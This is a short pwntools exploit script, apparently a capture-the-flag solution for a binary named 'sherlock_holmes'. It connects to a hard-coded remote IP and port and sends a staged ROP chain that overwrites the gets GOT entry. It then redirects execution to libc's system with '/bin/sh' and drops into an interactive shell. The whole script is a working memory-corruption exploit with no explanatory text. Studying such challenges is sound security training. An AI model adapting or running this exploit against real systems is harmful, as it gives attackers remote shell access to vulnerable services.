script.py

#!/usr/bin/env python2
from pwn import *
from ctypes import *

exe = context.binary = ELF("./sherlock_holmes")
libc = ELF("./libc.so.6")
#libc = exe.libc

add_rax_rdx = p64(0x0040047a)
mov_rdx = p64(0x00400546)
pop_rs = p64(0x0040056c)
pop_rdi = p64(0x0000000000400573)
gets_call = p64(0x00400500)
debug = p64(0x00400580)
nop = p64(0x00400574)
pop_rbp = p64(0x0000000000400445)
lea_rax = p64(0x00000000004004f9)
call_rax = p64(0x00000000004003d8)

#conn = process(exe.path)
conn = remote("46.101.214.32", 2468)

# gdb.attach(conn, '''
# b *{:#x}
# #b *0x00400506
# b *{:#x}
# c
# '''.format(u64(debug), u64(pop_rs)))

# stager
conn.sendline(fit({
    0x10: flat([
        p64(exe.got.gets - 0x18),

        pop_rdi,
        p64(exe.got.gets + 0x8),
        exe.plt.gets,

        pop_rdi,
        p64(exe.got.gets - 0x18),
        gets_call,
    ])
}))

# stage1
conn.sendline(fit({
    0x10: [
        nop * 200, # some stack space

        # call gets to nop out gets
        pop_rdi,
        p64(exe.got.gets),
        p64(exe.plt.gets),
        debug,

        mov_rdx,
        pop_rbp,
        p64(c_uint64(libc.symbols.system - libc.symbols.gets + 0x10).value),
        lea_rax,
        add_rax_rdx,

        p64(0xdeadbeef),
        pop_rdi,
        exe.got.gets + 0x8 + 0x10 + (14 + 200) * 8,

        debug,
        call_rax,
        "/bin/sh\0"
    ]
}))

# launcher
conn.sendline(flat([
    pop_rdi,
    pop_rs,
    p64(exe.got.gets - 0x18)[:7],
]))

conn.sendline(pop_rdi + "/bin/sh\0")

conn.interactive()